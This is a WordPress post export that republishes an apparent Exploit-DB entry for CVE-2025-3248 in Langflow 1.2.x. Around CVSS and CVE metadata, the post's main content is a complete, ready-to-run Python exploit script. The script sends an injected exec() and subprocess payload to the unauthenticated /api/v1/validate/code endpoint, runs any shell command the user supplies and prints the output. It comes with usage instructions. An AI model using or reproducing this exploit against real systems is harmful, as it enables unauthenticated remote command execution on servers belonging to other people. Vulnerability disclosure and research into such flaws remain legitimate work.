{"id":8221,"date":"2025-07-16T03:38:22","date_gmt":"2025-07-16T03:38:22","guid":{"rendered":"http:\/\/localhost\/?p=8221"},"modified":"2025-07-16T03:38:22","modified_gmt":"2025-07-16T03:38:22","slug":"langflow-12x-remote-code-execution-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=8221","title":{"rendered":"Langflow 1.2.x &#8211; Remote Code Execution (RCE)"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Langflow 1.2.x &#8211; Remote Code Execution (RCE)<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52364<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-16T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-16T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">9.8<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #cc0000; font-weight: bold;\">CRITICAL<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-3248<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\n!\/usr\/bin\/env python3 Exploit Title: Langflow 1.2.x &#8211; Remote&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n#!\/usr\/bin\/env python3<br \/>\n<br \/># Exploit Title: Langflow 1.2.x &#8211; Remote Code Execution (RCE)<br \/>\n<br \/># Date: 2025-07-11<br \/>\n<br \/># Exploit Author: Raghad Abdallah Al-syouf<br \/>\n<br \/># Vendor Homepage: https:\/\/github.com\/logspace-ai\/langflow<br \/>\n<br \/># Software Link: https:\/\/github.com\/logspace-ai\/langflow\/releases<br \/>\n<br \/># Version: <= 1.2.x\n<br \/># Tested on: Ubuntu \/ Docker<br \/>\n<br \/># CVE: CVE-2025-3248<\/p>\n<p># Description:<br \/>\n<br \/>#Langflow exposes a vulnerable endpoint `\/api\/v1\/validate\/code` that improperly evaluates arbitrary Python code via the `exec()` function. An unauthenticated remote attacker can execute arbitrary system commands.<\/p>\n<p># Usage:<br \/>\n<br \/>#python3 cve-2025-3248.py http:\/\/target:7860 &#8220;id&#8221;<\/p>\n<p>import requests<br \/>\n<br \/>import argparse<br \/>\n<br \/>import json<br \/>\n<br \/>from urllib.parse import urljoin<br \/>\n<br \/>from colorama import Fore, Style, init<br \/>\n<br \/>import random<\/p>\n<p>init(autoreset=True)<br \/>\n<br \/>requests.packages.urllib3.disable_warnings()<\/p>\n<p>BANNER_COLORS = [Fore.MAGENTA, Fore.CYAN, Fore.LIGHTBLUE_EX]<\/p>\n<p>def show_banner():<br \/>\n<br \/>    print(f&#8221;&#8221;&#8221;{Style.BRIGHT}{random.choice(BANNER_COLORS)}<br \/>\n<br \/>\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557<br \/>\n<br \/>\u2551          Langflow <= 1.2.x - CVE-2025-3248         \u2551\n<br \/>\u2551      Remote Code Execution via exposed API         \u2551<br \/>\n<br \/>\u2551     No authentication \u2014 triggers exec() call       \u2551<br \/>\n<br \/>\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d<br \/>\n<br \/>       Author: Raghad Abdallah Al-syouf<br \/>\n<br \/>{Style.RESET_ALL}&#8221;&#8221;&#8221;)<\/p>\n<p>class LangflowRCE:<br \/>\n<br \/>    def __init__(self, target_url, timeout=10):<br \/>\n<br \/>        self.base_url = target_url.rstrip(&#8216;\/&#8217;)<br \/>\n<br \/>        self.session = requests.Session()<br \/>\n<br \/>        self.session.verify = False<br \/>\n<br \/>        self.session.headers = {<br \/>\n<br \/>            &#8220;User-Agent&#8221;: &#8220;Langflow-RCE-Scanner&#8221;,<br \/>\n<br \/>            &#8220;Content-Type&#8221;: &#8220;application\/json&#8221;<br \/>\n<br \/>        }<br \/>\n<br \/>        self.timeout = timeout<\/p>\n<p>    def run_payload(self, command):<br \/>\n<br \/>        endpoint = urljoin(self.base_url, &#8220;\/api\/v1\/validate\/code&#8221;)<br \/>\n<br \/>        payload = {<br \/>\n<br \/>            &#8220;code&#8221;: (<br \/>\n<br \/>                f&#8221;def run(cd=exec(&#8216;raise Exception(__import__(\\&#8221;subprocess\\&#8221;).check_output(\\&#8221;{command}\\&#8221;, shell=True))&#8217;)): pass&#8221;<br \/>\n<br \/>            )<br \/>\n<br \/>        }<\/p>\n<p>        print(f&#8221;{Fore.YELLOW}[+] Sending crafted payload to: {endpoint}&#8221;)<br \/>\n<br \/>        try:<br \/>\n<br \/>            response = self.session.post(endpoint, data=json.dumps(payload), timeout=self.timeout)<br \/>\n<br \/>            print(f&#8221;{Fore.YELLOW}[+] HTTP {response.status_code}&#8221;)<br \/>\n<br \/>            if response.status_code == 200:<br \/>\n<br \/>                try:<br \/>\n<br \/>                    json_data = response.json()<br \/>\n<br \/>                    err = json_data.get(&#8220;function&#8221;, {}).get(&#8220;errors&#8221;, [&#8220;&#8221;])[0]<br \/>\n<br \/>                    if isinstance(err, str) and err.startswith(&#8220;b'&#8221;):<br \/>\n<br \/>                        output = err[2:-1].encode().decode(&#8220;unicode_escape&#8221;).strip()<br \/>\n<br \/>                        return output or &#8220;[!] No output returned.&#8221;<br \/>\n<br \/>                except Exception as e:<br \/>\n<br \/>                    return f&#8221;[!] Error parsing response: {e}&#8221;<br \/>\n<br \/>            return &#8220;[!] Target may not be vulnerable or is patched.&#8221;<br \/>\n<br \/>        except Exception as e:<br \/>\n<br \/>            return f&#8221;[!] Request failed: {e}&#8221;<\/p>\n<p>def main():<br \/>\n<br \/>    parser = argparse.ArgumentParser(description=&#8221;PoC &#8211; CVE-2025-3248 | Langflow <= v1.2.x Unauthenticated RCE\")\n<br \/>    parser.add_argument(&#8220;url&#8221;, help=&#8221;Target URL (e.g., http:\/\/localhost:7860)&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;cmd&#8221;, help=&#8221;Command to execute remotely (e.g., whoami)&#8221;)<br \/>\n<br \/>    args = parser.parse_args()<\/p>\n<p>    show_banner()<br \/>\n<br \/>    exploit = LangflowRCE(args.url)<br \/>\n<br \/>    result = exploit.run_payload(args.cmd)<\/p>\n<p>    print(f&#8221;\\n{Fore.GREEN}[+] Command Output:\\n{Style.RESET_ALL}{result}&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>\n<br \/>    main()\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52364\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Langflow 1.2.x &#8211; Remote Code Execution (RCE) Exploit ID EDB-ID:52364 Type exploitdb Published 2025-07-16T00:00:00 Modified 2025-07-16T00:00:00 CVSS Information CVSS&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-8221","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Langflow 1.2.x - Remote Code Execution (RCE) - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=8221\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Langflow 1.2.x - Remote Code Execution (RCE) - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Langflow 1.2.x &#8211; Remote Code Execution (RCE) Exploit ID EDB-ID:52364 Type exploitdb Published 2025-07-16T00:00:00 Modified 2025-07-16T00:00:00 CVSS Information CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=8221\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-16T03:38:22+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=8221#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=8221\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Langflow 1.2.x &#8211; Remote Code Execution (RCE)\",\"datePublished\":\"2025-07-16T03:38:22+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=8221\"},\"wordCount\":112,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=8221#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=8221\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=8221\",\"name\":\"Langflow 1.2.x - Remote Code Execution (RCE) - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-07-16T03:38:22+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=8221#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=8221\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=8221#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Langflow 1.2.x &#8211; Remote Code Execution (RCE)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Langflow 1.2.x - Remote Code Execution (RCE) - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=8221","og_locale":"en_US","og_type":"article","og_title":"Langflow 1.2.x - Remote Code Execution (RCE) - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Langflow 1.2.x &#8211; Remote Code Execution (RCE) Exploit ID EDB-ID:52364 Type exploitdb Published 2025-07-16T00:00:00 Modified 2025-07-16T00:00:00 CVSS Information CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=8221","og_site_name":"zero redgem","article_published_time":"2025-07-16T03:38:22+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=8221#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=8221"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Langflow 1.2.x &#8211; Remote Code Execution (RCE)","datePublished":"2025-07-16T03:38:22+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=8221"},"wordCount":112,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=8221#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=8221","url":"https:\/\/zero.redgem.net\/?p=8221","name":"Langflow 1.2.x - Remote Code Execution (RCE) - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-07-16T03:38:22+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=8221#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=8221"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=8221#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Langflow 1.2.x &#8211; Remote Code Execution (RCE)"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/8221","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8221"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/8221\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}